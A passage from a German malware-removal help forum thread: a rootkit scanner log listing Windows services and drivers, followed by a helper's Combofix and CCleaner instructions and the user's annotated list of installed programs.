23:13:25.0346 3596 [ FF4135424A79DCC2998276D8E39C9B4D ] TimeBroker C:\WINDOWS\System32\TimeBrokerServer.dll
23:13:25.0356 3596 TimeBroker - ok
23:13:25.0395 3596 [ B44EFE254C0B3719E4037088D24FE4B5 ] TPM C:\WINDOWS\system32\drivers\tpm.sys
23:13:25.0406 3596 TPM - ok
23:13:25.0422 3596 [ 8C8CF3041B27E7657ADD0EE17F6DBFCA ] TrkWks C:\WINDOWS\System32\trkwks.dll
23:13:25.0433 3596 TrkWks - ok
23:13:25.0487 3596 [ 8D516AEF3C1DF980664CF17BB1FF6093 ] TrustedInstaller C:\WINDOWS\servicing\TrustedInstaller.exe
23:13:25.0506 3596 TrustedInstaller - ok
23:13:25.0520 3596 [ 4E7C5FB10A50435523DE0CAA37DE2BD3 ] TsUsbFlt C:\WINDOWS\system32\drivers\tsusbflt.sys
23:13:25.0538 3596 TsUsbFlt - ok
23:13:25.0554 3596 [ 16D684A820872EE54F6370703AC0B513 ] TsUsbGD C:\WINDOWS\System32\drivers\TsUsbGD.sys
23:13:25.0562 3596 TsUsbGD - ok
23:13:25.0576 3596 [ E1748D04AE40118B62BC18AC86032192 ] tsusbhub C:\WINDOWS\system32\drivers\tsusbhub.sys
23:13:25.0580 3596 tsusbhub ( UnsignedFile.Multi.Generic ) - warning
23:13:25.0580 3596 tsusbhub - detected UnsignedFile.Multi.Generic (1)
23:13:25.0622 3596 [ 78C9EE193AC2B4CBDBC48B620314D740 ] tunnel C:\WINDOWS\system32\DRIVERS\tunnel.sys
23:13:25.0640 3596 tunnel - ok
23:13:25.0656 3596 [ 6D4F67CA56ACA2085DFA2CD89EAFBC1A ] uagp35 C:\WINDOWS\system32\drivers\uagp35.sys
23:13:25.0665 3596 uagp35 - ok
23:13:25.0679 3596 [ 6FD6D03B7752C78712E5CFF29A305026 ] UASPStor C:\WINDOWS\System32\drivers\uaspstor.sys
23:13:25.0689 3596 UASPStor - ok
23:13:25.0703 3596 [ 1ED222DFE6C13DA50FE081ABF90CAFE1 ] UCX01000 C:\WINDOWS\System32\drivers\ucx01000.sys
23:13:25.0715 3596 UCX01000 - ok
23:13:25.0733 3596 [ DC5A461591C71AF7F19DC048A81E3F88 ] udfs C:\WINDOWS\system32\DRIVERS\udfs.sys
23:13:25.0750 3596 udfs - ok
23:13:25.0759 3596 [ FB3475FEA1CCB0DAEA1EBE44D0E3BB7D ] UI0Detect C:\WINDOWS\system32\UI0Detect.exe
23:13:25.0772 3596 UI0Detect - ok
23:13:25.0810 3596 [ 07FEBCDF24FABA0D47B635D85A0FFB7A ] uliagpkx C:\WINDOWS\system32\drivers\uliagpkx.sys
23:13:25.0819 3596 uliagpkx - ok
23:13:25.0825 3596 [ 02CEB3FE6152668A7BA420B93B664860 ] umbus C:\WINDOWS\System32\drivers\umbus.sys
23:13:25.0834 3596 umbus - ok
23:13:25.0850 3596 [ 991EE6B5FC41EAEF99C8AF5B92F2CA09 ] UmPass C:\WINDOWS\System32\drivers\umpass.sys
23:13:25.0859 3596 UmPass - ok
23:13:25.0880 3596 [ 43FEFB040A0CC30F795FBF544169594D ] UmRdpService C:\WINDOWS\System32\umrdp.dll
23:13:25.0893 3596 UmRdpService - ok
23:13:25.0911 3596 [ 14D22C411854AA2560AFC94CD2D5E61F ] upnphost C:\WINDOWS\System32\upnphost.dll
23:13:25.0929 3596 upnphost - ok
23:13:25.0958 3596 [ 43228F8EDD1B0BCDD3145AD246E63D39 ] USBAAPL64 C:\WINDOWS\System32\Drivers\usbaapl64.sys
23:13:25.0975 3596 USBAAPL64 - ok
23:13:26.0023 3596 [ 3FBE0784E42E7BA93FCC5201D2BAFE23 ] usbaudio C:\WINDOWS\system32\drivers\usbaudio.sys
23:13:26.0051 3596 usbaudio - ok
23:13:26.0071 3596 [ 2AF9F0E16D75B8F783A1ACE74EF51C9B ] usbccgp C:\WINDOWS\System32\drivers\usbccgp.sys
23:13:26.0082 3596 usbccgp - ok
23:13:26.0099 3596 [ B395B62B62F28106218FA6FB17F4C797 ] usbcir C:\WINDOWS\System32\drivers\usbcir.sys
23:13:26.0116 3596 usbcir - ok
23:13:26.0133 3596 [ 52F267AEE8CA5AA5CEB88C6A71EE1E86 ] usbehci C:\WINDOWS\System32\drivers\usbehci.sys
23:13:26.0142 3596 usbehci - ok
23:13:26.0176 3596 [ 858BE9C0E498C8E505E198E17EECE0D9 ] usbfilter C:\WINDOWS\system32\DRIVERS\usbfilter.sys
23:13:26.0182 3596 usbfilter - ok
23:13:26.0206 3596 [ FBB6794E3BBAD92D66D59D206C1F849F ] usbhub C:\WINDOWS\System32\drivers\usbhub.sys
23:13:26.0224 3596 usbhub - ok
23:13:26.0287 3596 [ B7A948501424805571BF562BB0BFE31D ] USBHUB3 C:\WINDOWS\System32\drivers\UsbHub3.sys
23:13:26.0303 3596 USBHUB3 - ok
23:13:26.0315 3596 [ 325F6179009B5A7F6118951A5BA422AB ] usbohci C:\WINDOWS\System32\drivers\usbohci.sys
23:13:26.0336 3596 usbohci - ok
23:13:26.0350 3596 [ BA3ABE0CD1C14B3295BAD0F076B84CAC ] usbprint C:\WINDOWS\System32\drivers\usbprint.sys
23:13:26.0358 3596 usbprint - ok
23:13:26.0388 3596 [ A9858597B6DB695F78A37F6755A6FF98 ] usbscan C:\WINDOWS\system32\DRIVERS\usbscan.sys
23:13:26.0417 3596 usbscan - ok
23:13:26.0433 3596 [ F77177F6C95B2116EE7AD23B5EF57007 ] USBSTOR C:\WINDOWS\System32\drivers\USBSTOR.SYS
23:13:26.0443 3596 USBSTOR - ok
23:13:26.0462 3596 [ D25EF4A6EC244C5DE85D88A05B7C149D ] usbuhci C:\WINDOWS\System32\drivers\usbuhci.sys
23:13:26.0482 3596 usbuhci - ok
23:13:26.0517 3596 [ 09799E701B4327097E9F63D3FE221083 ] usbvideo C:\WINDOWS\System32\Drivers\usbvideo.sys
23:13:26.0527 3596 usbvideo - ok
23:13:26.0548 3596 [ 9CD4259AD15F84DE27B94A956C978D6C ] USBXHCI C:\WINDOWS\System32\drivers\USBXHCI.SYS
23:13:26.0562 3596 USBXHCI - ok
23:13:26.0595 3596 [ EAA2B638339E302CA02DD35248B64B93 ] usb_rndisx C:\WINDOWS\system32\DRIVERS\usb8023x.sys
23:13:26.0615 3596 usb_rndisx - ok
23:13:26.0633 3596 [ F702AB6181513303AB0FC8D59E52708B ] VaultSvc C:\WINDOWS\system32\lsass.exe
23:13:26.0642 3596 VaultSvc - ok
23:13:26.0654 3596 [ BACECBFF9C97F7627A60B0E0F1FE7EE8 ] vdrvroot C:\WINDOWS\system32\drivers\vdrvroot.sys
23:13:26.0663 3596 vdrvroot - ok
23:13:26.0694 3596 [ 8A8CDA9E3CF2E0B4C6CC19FBC6FB9A71 ] vds C:\WINDOWS\System32\vds.exe
23:13:26.0729 3596 vds - ok
23:13:26.0745 3596 [ 74FA2D4368DE6F6CE14393EDF1F342BE ] VerifierExt C:\WINDOWS\system32\drivers\VerifierExt.sys
23:13:26.0755 3596 VerifierExt - ok
23:13:26.0790 3596 [ 8628FA679F0EC4B709CCD1F6B6A3233B ] vhdmp C:\WINDOWS\System32\drivers\vhdmp.sys
23:13:26.0808 3596 vhdmp - ok
23:13:26.0870 3596 [ DFDF7F9CAA50EE72A633EA4BBD65A557 ] VIAHdAudAddService C:\WINDOWS\system32\drivers\viahduaa.sys
23:13:26.0893 3596 VIAHdAudAddService - ok
23:13:26.0906 3596 [ F5B4A14B00E89250C50982AC762DDD1D ] viaide C:\WINDOWS\system32\drivers\viaide.sys
23:13:26.0915 3596 viaide - ok
23:13:26.0942 3596 [ 0E43886F01C85B47BA0A3157274BCF59 ] Vid C:\WINDOWS\System32\drivers\Vid.sys
23:13:26.0953 3596 Vid - ok
23:13:26.0985 3596 [ 78DB50F7329F6D1311658DABFFFC8BE0 ] vmbus C:\WINDOWS\system32\drivers\vmbus.sys
23:13:26.0995 3596 vmbus - ok
23:13:27.0010 3596 [ ECFEE2F2BA3932C7880D1A8F67D68F91 ] VMBusHID C:\WINDOWS\System32\drivers\VMBusHID.sys
23:13:27.0018 3596 VMBusHID - ok
23:13:27.0033 3596 [ B4F432A51826FFC66F4DF72A83E8E4B1 ] vmbusr C:\WINDOWS\System32\drivers\vmbusr.sys
23:13:27.0044 3596 vmbusr - ok
23:13:27.0081 3596 [ B8FF4248103E6EA47B9D85C55673ABA3 ] vmicheartbeat C:\WINDOWS\System32\ICSvc.dll
23:13:27.0094 3596 vmicheartbeat - ok
23:13:27.0100 3596 [ B8FF4248103E6EA47B9D85C55673ABA3 ] vmickvpexchange C:\WINDOWS\System32\ICSvc.dll
23:13:27.0111 3596 vmickvpexchange - ok
23:13:27.0118 3596 [ B8FF4248103E6EA47B9D85C55673ABA3 ] vmicrdv C:\WINDOWS\System32\ICSvc.dll
23:13:27.0129 3596 vmicrdv - ok
23:13:27.0136 3596 [ B8FF4248103E6EA47B9D85C55673ABA3 ] vmicshutdown C:\WINDOWS\System32\ICSvc.dll
23:13:27.0147 3596 vmicshutdown - ok
23:13:27.0173 3596 [ B8FF4248103E6EA47B9D85C55673ABA3 ] vmictimesync C:\WINDOWS\System32\ICSvc.dll
23:13:27.0184 3596 vmictimesync - ok
23:13:27.0195 3596 [ B8FF4248103E6EA47B9D85C55673ABA3 ] vmicvss C:\WINDOWS\System32\ICSvc.dll
23:13:27.0206 3596 vmicvss - ok
23:13:27.0218 3596 [ CB60FAAED8B49B812EBBF77EB87D9B18 ] volmgr C:\WINDOWS\system32\drivers\volmgr.sys
23:13:27.0228 3596 volmgr - ok
23:13:27.0245 3596 [ A74101DA9809251BCD0E5A26BAE0F824 ] volmgrx C:\WINDOWS\system32\drivers\volmgrx.sys
23:13:27.0260 3596 volmgrx - ok
23:13:27.0272 3596 [ 2FB3CDFD5EAF4CD9D4AFAF96877D13AE ] volsnap C:\WINDOWS\system32\drivers\volsnap.sys
23:13:27.0285 3596 volsnap - ok
23:13:27.0300 3596 [ A8DA1C1B52ECEA3726DEBED4FF1B700D ] vpci C:\WINDOWS\System32\drivers\vpci.sys
23:13:27.0321 3596 vpci - ok
23:13:27.0342 3596 [ 0190AFFF28F600461C0164353CC7EE27 ] vpcivsp C:\WINDOWS\System32\drivers\vpcivsp.sys
23:13:27.0351 3596 vpcivsp - ok
23:13:27.0369 3596 [ 38A60CD9C009C55C6D3B5586F8E6A353 ] vsmraid C:\WINDOWS\system32\drivers\vsmraid.sys
23:13:27.0380 3596 vsmraid - ok
23:13:27.0477 3596 [ EA658570314042C914964FC72AB50E6B ] VSS C:\WINDOWS\system32\vssvc.exe
23:13:27.0509 3596 VSS - ok
23:13:27.0533 3596 [ A0F6FE0FC2F647C22BBFD6BD4249DBCC ] VSTXRAID C:\WINDOWS\system32\drivers\vstxraid.sys
23:13:27.0547 3596 VSTXRAID - ok
23:13:27.0562 3596 [ 62460A45435A26A334907E3F2EA45611 ] vwifibus C:\WINDOWS\System32\drivers\vwifibus.sys
23:13:27.0571 3596 vwifibus - ok
23:13:27.0592 3596 [ F690B6EEAA94576727B24376D7ED3601 ] W32Time C:\WINDOWS\system32\w32time.dll
23:13:27.0607 3596 W32Time - ok
23:13:27.0680 3596 [ 901CC968412F8155B08D7ABE0171166A ] W3SVC C:\WINDOWS\system32\inetsrv\iisw3adm.dll
23:13:27.0694 3596 W3SVC - ok
23:13:27.0707 3596 [ 6B806E893714019969E2B50D7EF6A4D9 ] WacomPen C:\WINDOWS\System32\drivers\wacompen.sys
23:13:27.0716 3596 WacomPen - ok
23:13:27.0751 3596 [ 6081CEC9EF9EB145D8B46655C7708D51 ] Wanarp C:\WINDOWS\system32\DRIVERS\wanarp.sys
23:13:27.0767 3596 Wanarp - ok
23:13:27.0771 3596 [ 6081CEC9EF9EB145D8B46655C7708D51 ] Wanarpv6 C:\WINDOWS\system32\DRIVERS\wanarp.sys
23:13:27.0779 3596 Wanarpv6 - ok
23:13:27.0789 3596 [ 901CC968412F8155B08D7ABE0171166A ] WAS C:\WINDOWS\system32\inetsrv\iisw3adm.dll
23:13:27.0801 3596 WAS - ok
23:13:27.0849 3596 [ 42DF22F8C448E7CD219F6D63743505E2 ] wbengine C:\WINDOWS\system32\wbengine.exe
23:13:27.0882 3596 wbengine - ok
23:13:27.0902 3596 [ 31D37B2F6069C631EF0557D322924812 ] WbioSrvc C:\WINDOWS\System32\wbiosrvc.dll
23:13:27.0915 3596 WbioSrvc - ok
23:13:27.0927 3596 [ D9C1E82651BF19C6FF69CEC6FD400124 ] Wcmsvc C:\WINDOWS\System32\wcmsvc.dll
23:13:27.0940 3596 Wcmsvc - ok
23:13:27.0981 3596 [ 5B5FEAB51172F5513C2CF7B39CFA6A01 ] wcncsvc C:\WINDOWS\System32\wcncsvc.dll
23:13:28.0006 3596 wcncsvc - ok
23:13:28.0026 3596 [ E19556D414332E2BEBA1F368229006B4 ] WcsPlugInService C:\WINDOWS\System32\WcsPlugInService.dll
23:13:28.0045 3596 WcsPlugInService - ok
23:13:28.0067 3596 [ B3A4D918DAB90505B6BC7B70632913CB ] Wd C:\WINDOWS\system32\drivers\wd.sys
23:13:28.0075 3596 Wd - ok
23:13:28.0095 3596 [ 260F8DFC4D5748F4CCB9B19CFB0E58EA ] WdBoot C:\WINDOWS\system32\drivers\WdBoot.sys
23:13:28.0104 3596 WdBoot - ok
23:13:28.0142 3596 [ 2ADC985B85A71BD7D99712EC0C24358B ] Wdf01000 C:\WINDOWS\system32\drivers\Wdf01000.sys
23:13:28.0162 3596 Wdf01000 - ok
23:13:28.0195 3596 [ 880FFFC4D5BBBB4187B6B04AB2E8C32A ] WdFilter C:\WINDOWS\system32\drivers\WdFilter.sys
23:13:28.0215 3596 WdFilter - ok
23:13:28.0230 3596 [ 240FC332484572227CD1DF82407F33E5 ] WdiServiceHost C:\WINDOWS\system32\wdi.dll
23:13:28.0246 3596 WdiServiceHost - ok
23:13:28.0251 3596 [ 240FC332484572227CD1DF82407F33E5 ] WdiSystemHost C:\WINDOWS\system32\wdi.dll
23:13:28.0266 3596 WdiSystemHost - ok
23:13:28.0272 3596 [ F2002DA5E6B78C15B2CD48CFF8F0FBB6 ] WebClient C:\WINDOWS\System32\webclnt.dll
23:13:28.0287 3596 WebClient - ok
23:13:28.0294 3596 [ 35FD720943D4FCD75C3275BF062FF140 ] Wecsvc C:\WINDOWS\system32\wecsvc.dll
23:13:28.0307 3596 Wecsvc - ok
23:13:28.0324 3596 [ 4D2612E3C462B68F499D840B1133263E ] wercplsupport C:\WINDOWS\System32\wercplsupport.dll
23:13:28.0341 3596 wercplsupport - ok
23:13:28.0351 3596 [ 8E2426162ED6749A127B35D235F21E11 ] WerSvc C:\WINDOWS\System32\WerSvc.dll
23:13:28.0373 3596 WerSvc - ok
23:13:28.0385 3596 [ FE762D3498719C3A23471BBA62F747B4 ] WFPLWFS C:\WINDOWS\system32\DRIVERS\wfplwfs.sys
23:13:28.0395 3596 WFPLWFS - ok
23:13:28.0410 3596 [ 60E0C220593DA4F7C289CB909D2DBAE0 ] WiaRpc C:\WINDOWS\System32\wiarpc.dll
23:13:28.0420 3596 WiaRpc - ok
23:13:28.0434 3596 [ A3C7624A42A3447EF5EDD1ED37FE4E60 ] WIMMount C:\WINDOWS\system32\drivers\wimmount.sys
23:13:28.0443 3596 WIMMount - ok
23:13:28.0460 3596 WinDefend - ok
23:13:28.0508 3596 [ 7911470B6018059A880469A63B65700A ] WinHttpAutoProxySvc C:\WINDOWS\system32\winhttp.dll
23:13:28.0535 3596 WinHttpAutoProxySvc - ok
23:13:28.0600 3596 [ 3D6B518B71C75C8FA4115A33615C107A ] Winmgmt C:\WINDOWS\system32\wbem\WMIsvc.dll
23:13:28.0612 3596 Winmgmt - ok
23:13:28.0673 3596 [ 8E212A627F33F6FC3B5F3BB47212F66E ] WinRM C:\WINDOWS\system32\WsmSvc.dll
23:13:28.0714 3596 WinRM - ok
23:13:28.0760 3596 [ BB20956C424531003F7FA6CD36F11D5D ] WinUsb C:\WINDOWS\system32\DRIVERS\WinUsb.sys
23:13:28.0778 3596 WinUsb - ok
23:13:28.0809 3596 [ 6351724B8FA0255C2DBD970297F00B93 ] WlanSvc C:\WINDOWS\System32\wlansvc.dll
23:13:28.0834 3596 WlanSvc - ok
23:13:28.0874 3596 [ 06C8FA1CF39DE6A735B54D906BA791C6 ] wlcrasvc C:\Program Files\Windows Live\Mesh\wlcrasvc.exe
23:13:28.0880 3596 wlcrasvc - ok
23:13:28.0920 3596 [ B330CE47FB74A6BE9A3FFFF4B3F64D9B ] wlidsvc C:\WINDOWS\system32\wlidsvc.dll
23:13:28.0961 3596 wlidsvc - ok
23:13:28.0991 3596 [ 14C35BA8189C6F65D839163AA285E954 ] WmFilter C:\WINDOWS\system32\drivers\WmFilter.sys
23:13:28.0997 3596 WmFilter - ok
23:13:29.0013 3596 [ AC4331AF118A720F13C9C5CABBFE27BD ] WmHidLo C:\WINDOWS\system32\drivers\WmHidLo.sys
23:13:29.0019 3596 WmHidLo - ok
23:13:29.0035 3596 [ E2A596CACFC6504306CDB7B593B90084 ] WmiAcpi C:\WINDOWS\System32\drivers\wmiacpi.sys
23:13:29.0050 3596 WmiAcpi - ok
23:13:29.0091 3596 [ D113499052C5E541906B727779F0F959 ] wmiApSrv C:\WINDOWS\system32\wbem\WmiApSrv.exe
23:13:29.0104 3596 wmiApSrv - ok
23:13:29.0113 3596 WMPNetworkSvc - ok
23:13:29.0130 3596 [ C6FF953D5D6F2EAE3B8883474D5076B3 ] wpcfltr C:\WINDOWS\system32\DRIVERS\wpcfltr.sys
23:13:29.0149 3596 wpcfltr - ok
23:13:29.0189 3596 [ A6ED163169876BFD2437E872FE2F1509 ] WPCSvc C:\WINDOWS\System32\wpcsvc.dll
23:13:29.0199 3596 WPCSvc - ok
23:13:29.0223 3596 [ 94AA5150E35B3ABB7191FE641E3C2473 ] WPDBusEnum C:\WINDOWS\system32\wpdbusenum.dll
23:13:29.0233 3596 WPDBusEnum - ok
23:13:29.0243 3596 [ 0346CAFC181C91C6E2330332EB332ED6 ] WpdUpFltr C:\WINDOWS\system32\drivers\WpdUpFltr.sys
23:13:29.0252 3596 WpdUpFltr - ok
23:13:29.0284 3596 [ BC8B5CB336E63BB25EAD1CE8EDD34B81 ] ws2ifsl C:\WINDOWS\system32\drivers\ws2ifsl.sys
23:13:29.0301 3596 ws2ifsl - ok
23:13:29.0362 3596 [ FB0C1B7F94FA08E72F19F6F2CE7210E1 ] wscsvc C:\WINDOWS\System32\wscsvc.dll
23:13:29.0373 3596 wscsvc - ok
23:13:29.0378 3596 WSearch - ok
23:13:29.0547 3596 [ C10BFFEE7E0D7A1366E84F251796C51D ] WSService C:\WINDOWS\System32\WSService.dll
23:13:29.0603 3596 WSService - ok
23:13:29.0700 3596 [ A8484C0CB54DB48180FB7CA00F1C3F8F ] wuauserv C:\WINDOWS\system32\wuaueng.dll
23:13:29.0753 3596 wuauserv - ok
23:13:29.0782 3596 [ AB886378EEB55C6C75B4F2D14B6C869F ] WudfPf C:\WINDOWS\system32\drivers\WudfPf.sys
23:13:29.0791 3596 WudfPf - ok
23:13:29.0863 3596 [ DDA4CAF29D8C0A297F886BFE561E6659 ] WUDFRd C:\WINDOWS\System32\drivers\WUDFRd.sys
23:13:29.0879 3596 WUDFRd - ok
23:13:29.0886 3596 [ DDA4CAF29D8C0A297F886BFE561E6659 ] WUDFSensorLP C:\WINDOWS\system32\DRIVERS\WUDFRd.sys
23:13:29.0896 3596 WUDFSensorLP - ok
23:13:29.0928 3596 [ B20F051B03A966392364C83F009F7D17 ] wudfsvc C:\WINDOWS\System32\WUDFSvc.dll
23:13:29.0939 3596 wudfsvc - ok
23:13:29.0945 3596 [ DDA4CAF29D8C0A297F886BFE561E6659 ] WUDFWpdFs C:\WINDOWS\system32\DRIVERS\WUDFRd.sys
23:13:29.0955 3596 WUDFWpdFs - ok
23:13:29.0960 3596 [ DDA4CAF29D8C0A297F886BFE561E6659 ] WUDFWpdMtp C:\WINDOWS\system32\DRIVERS\WUDFRd.sys
23:13:29.0970 3596 WUDFWpdMtp - ok
23:13:30.0005 3596 [ F9D8D2E6ECE08B278621D5BF3A7240A6 ] WwanSvc C:\WINDOWS\System32\wwansvc.dll
23:13:30.0029 3596 WwanSvc - ok
23:13:30.0039 3596 ================ Scan global ===============================
23:13:30.0084 3596 [ DDC1AFBF9DDF880CE9BD3896114D8DED ] C:\WINDOWS\system32\basesrv.dll
23:13:30.0124 3596 [ E9343076AE704D20BB0D01F3AF3EFFEF ] C:\WINDOWS\system32\winsrv.dll
23:13:30.0159 3596 [ BD7C6949984D19AAA609896B675E7357 ] C:\WINDOWS\system32\sxssrv.dll
23:13:30.0203 3596 [ 8F226143046435C75C033B0C52E90FFE ] C:\WINDOWS\system32\services.exe
23:13:30.0208 3596 [Global] - ok
23:13:30.0209 3596 ================ Scan MBR ==================================
23:13:30.0223 3596 [ 72B8CE41AF0DE751C946802B3ED844B4 ] \Device\Harddisk0\DR0
23:13:30.0587 3596 \Device\Harddisk0\DR0 - ok
23:13:30.0590 3596 [ 5C616939100B85E558DA92B899A0FC36 ] \Device\Harddisk1\DR1
23:13:30.0607 3596 \Device\Harddisk1\DR1 - ok
23:13:30.0613 3596 [ 671B81004FDD1588FA9ED1331C9CECA9 ] \Device\Harddisk2\DR2
23:13:30.0698 3596 \Device\Harddisk2\DR2 - ok
23:13:30.0776 3596 [ 633150EB706C046D64591B7DA0597813 ] \Device\Harddisk3\DR3
23:13:31.0715 3596 \Device\Harddisk3\DR3 - ok
23:13:31.0715 3596 ================ Scan VBR ==================================
23:13:31.0718 3596 [ 9E42A3F5CF37E5F90919ADA5C12921D9 ] \Device\Harddisk0\DR0\Partition1
23:13:31.0719 3596 \Device\Harddisk0\DR0\Partition1 - ok
23:13:31.0740 3596 [ C798AA7565CAB19107253365575E7588 ] \Device\Harddisk0\DR0\Partition2
23:13:31.0741 3596 \Device\Harddisk0\DR0\Partition2 - ok
23:13:31.0744 3596 [ 82E752A19BD2208C58B9FAC027494E06 ] \Device\Harddisk1\DR1\Partition1
23:13:31.0745 3596 \Device\Harddisk1\DR1\Partition1 - ok
23:13:31.0750 3596 [ CE6229B557CA0FC6AC2BE50DF40D9767 ] \Device\Harddisk2\DR2\Partition1
23:13:31.0752 3596 \Device\Harddisk2\DR2\Partition1 - ok
23:13:31.0777 3596 [ 378875C63887F99ED2BC9C9FCFC096D1 ] \Device\Harddisk3\DR3\Partition1
23:13:31.0781 3596 \Device\Harddisk3\DR3\Partition1 - ok
23:13:31.0782 3596 ============================================================
23:13:31.0782 3596 Scan finished
23:13:31.0782 3596 ============================================================
23:13:31.0797 3048 Detected object count: 7
23:13:31.0797 3048 Actual detected object count: 7
23:13:35.0106 3048 FirebirdServerMAGIXInstance ( UnsignedFile.Multi.Generic ) - skipped by user
23:13:35.0106 3048 FirebirdServerMAGIXInstance ( UnsignedFile.Multi.Generic ) - User select action: Skip
23:13:35.0108 3048 IDriverT ( UnsignedFile.Multi.Generic ) - skipped by user
23:13:35.0108 3048 IDriverT ( UnsignedFile.Multi.Generic ) - User select action: Skip
23:13:35.0110 3048 LightScribeService ( UnsignedFile.Multi.Generic ) - skipped by user
23:13:35.0110 3048 LightScribeService ( UnsignedFile.Multi.Generic ) - User select action: Skip
23:13:35.0112 3048 Netzmanager Service ( UnsignedFile.Multi.Generic ) - skipped by user
23:13:35.0112 3048 Netzmanager Service ( UnsignedFile.Multi.Generic ) - User select action: Skip
23:13:35.0114 3048 Sound Blaster X-Fi MB Licensing Service ( UnsignedFile.Multi.Generic ) - skipped by user
23:13:35.0114 3048 Sound Blaster X-Fi MB Licensing Service ( UnsignedFile.Multi.Generic ) - User select action: Skip
23:13:35.0116 3048 SwitchBoard ( UnsignedFile.Multi.Generic ) - skipped by user
23:13:35.0116 3048 SwitchBoard ( UnsignedFile.Multi.Generic ) - User select action: Skip
23:13:35.0118 3048 tsusbhub ( UnsignedFile.Multi.Generic ) - skipped by user
23:13:35.0118 3048 tsusbhub ( UnsignedFile.Multi.Generic ) - User select action: Skip

markusg 27.02.2013 12:59

hi,
Scan mit Combofix
WARNUNG an die MITLESER:
Combofix sollte ausschließlich ausgeführt werden, wenn dies von einem Teammitglied angewiesen wurde!

Downloade dir bitte Combofix vom folgenden Downloadspiegel: Link
  • WICHTIG: Speichere Combofix auf deinem Desktop.
  • Deaktiviere bitte alle deine Antivirensoftware sowie Malware/Spyware Scanner. Diese können Combofix bei der Arbeit stören. Combofix meckert auch manchmal trotzdem noch, das kannst du dann ignorieren, mir aber bitte mitteilen.
  • Starte die Combofix.exe und folge den Anweisungen auf dem Bildschirm.
  • Während Combofix läuft bitte nicht am Computer arbeiten, die Maus bewegen oder ins Combofixfenster klicken!
  • Wenn Combofix fertig ist, wird es ein Logfile erstellen.
  • Bitte poste die C:\Combofix.txt in deiner nächsten Antwort (möglichst in CODE-Tags).
Hinweis: Solltest du nach dem Neustart folgende Fehlermeldung erhalten
Es wurde versucht, einen Registrierungsschlüssel einem ungültigen Vorgang zu unterziehen, der zum Löschen markiert wurde.
starte den Rechner einfach neu. Dies sollte das Problem beheben.


MrVain712 27.02.2013 19:51

ich glaub das combofix unterstützt kein windows 8 64bit...
zumindest sagt es mir das... ich versuchs mal im kompatibilitätsmodus

markusg 27.02.2013 19:52

hi, nein lass es weg.

lade den CCleaner standard:
CCleaner - Download - Filepony
falls der CCleaner
bereits instaliert, überspringen.
öffnen, Tools (extras),uninstall Llist, als txt speichern. öffnen.
hinter, jedes von dir benötigte programm, schreibe notwendig.
hinter, jedes, von dir nicht benötigte, unnötig.
hinter, dir unbekannte, unbekannt.
liste posten.

MrVain712 27.02.2013 22:38

7-Zip 9.20 03.02.2013 notwendig
Acrobat.com Adobe Systems Incorporated 01.12.2012 1.1.377 unbekannt
Adobe Acrobat X Pro - English, Français, Deutsch Adobe Systems 26.02.2013 5,74GB 10.1.6 notwendig
Adobe AIR Adobe Systems Inc. 01.12.2012 1.5.3.9120 unbekannt
Adobe Community Help Adobe Systems Incorporated 01.12.2012 3.0.0.400 unbekannt
Adobe Flash Player 11 Plugin Adobe Systems Incorporated 26.02.2013 6,00MB 11.6.602.171 notwendig
Adobe Media Player Adobe Systems Incorporated 01.12.2012 1.8 unbekannt
Adobe Photoshop CS5 Adobe Systems Incorporated 01.12.2012 2,53GB 12.0 notwendig
Adobe Reader X (10.1.6) - Deutsch Adobe Systems Incorporated 24.02.2013 122MB 10.1.6 notwendig
Amazon MP3-Downloader 1.0.17 Amazon Services LLC 01.12.2012 1.0.17 notwendig
AMD Catalyst Install Manager Advanced Micro Devices, Inc. 02.11.2012 26,3MB 8.0.891.0 notwendig
AmoK Playlist Copy 2.06 Dirk Paehl 28.12.2012 2.06 notwendig
Apple Application Support Apple Inc. 23.02.2013 62,7MB 2.3.3 unbekannt
Apple Mobile Device Support Apple Inc. 04.12.2012 25,1MB 6.0.1.3 unbekannt
Apple Software Update Apple Inc. 14.08.2011 2,38MB 2.1.3.127 notwendig
ASRock IES v2.0.83 09.08.2011 8,99MB unbekannt
ASRock InstantBoot v1.24 09.08.2011 unbekannt
ASRock OC Tuner v2.3.76 09.08.2011 unbekannt
AVS Update Manager 1.0 Online Media Technologies Ltd. 13.01.2013 unbekannt
AVS Video Converter 8 Online Media Technologies Ltd. 13.01.2013 notwendig
AVS4YOU Software Navigator 1.4 Online Media Technologies Ltd. 13.01.2013 unbekannt
Bonjour Apple Inc. 23.12.2012 2,04MB 3.0.0.10 unbekannt
Canon MP490 series MP Drivers 01.12.2012 notwendig
CCleaner Piriform 25.02.2013 3.28 notwendig
CodeMeter Runtime Kit v4.50c WIBU-SYSTEMS AG 17.02.2013 34,9MB 4.50.906.503 notwendig
Digieffects Phenomena Particle Effects MAGIX AG 01.02.2013 1.0.0.1 unnötig
DigiJay 1.400 MB Audio 23.12.2012 6,55MB notwendig
DirPrinter - Deinstallation Mathias Gerlach [aborange.de] 01.01.2012 10,7MB 8.00 notwendig
EasyBCD 2.1.2 NeoSmart Technologies 01.12.2012 2.1.2 notwendig
Facebook Messenger 2.1.4651.0 Facebook 26.09.2012 34,9MB 2.1.4651.0 notwendig
FileZilla Client 3.6.0.2 FileZilla Project 06.02.2013 17,1MB 3.6.0.2 notwendig
FILSHtray FILSH Media GmbH 27.04.2012 15,3MB 0.12 unnötig
Firebird SQL Server - MAGIX Edition MAGIX AG 31.01.2013 11,5MB 2.1.31.0 unbekannt
Fraps (remove only) 01.12.2012 notwendig
Free Studio version 5.9.0.1212 DVDVideoSoft Ltd. 31.12.2012 550MB 5.9.0.1212 unbekannt
Fussball Manager 12 RAF 24.10.2011 v1.0.0.0 unnötig
Google Chrome Google Inc. 28.08.2011 25.0.1364.97 notwendig
Google Earth Google 17.11.2011 92,7MB 6.1.0.5001 unnötig
HandBrake 0.9.8 13.01.2013 0.9.8 unnötig
Hardcopy (C:\Program Files (x86)\Hardcopy) Hardcopy für Windows - Ein Tastendruck und Ihr Bildschirm oder Fenster wird ausgedruckt oder abgespeichert. 01.12.2012 2011.07.02 notwendig
ICQ 8.0 (build 5981, für aktuellen Benutzer) Mail.Ru 01.01.2013 8.0.5981.0 notwendig
ICQ7.7 ICQ 05.02.2012 7.7 notwendig
ipswDownloader 1.6 Sergey 'iOrange' Kudlay 22.01.2013 1.6 unnötig
IsoBuster 3.1 Smart Projects 04.01.2013 9,26MB 3.1 notwendig
iTunes Apple Inc. 23.12.2012 189MB 11.0.1.12 notwendig
Java 7 Update 15 Oracle 24.02.2013 129MB 7.0.150 notwendig
Java(TM) 6 Update 22 Oracle 08.10.2011 97,0MB 6.0.220 notwendig
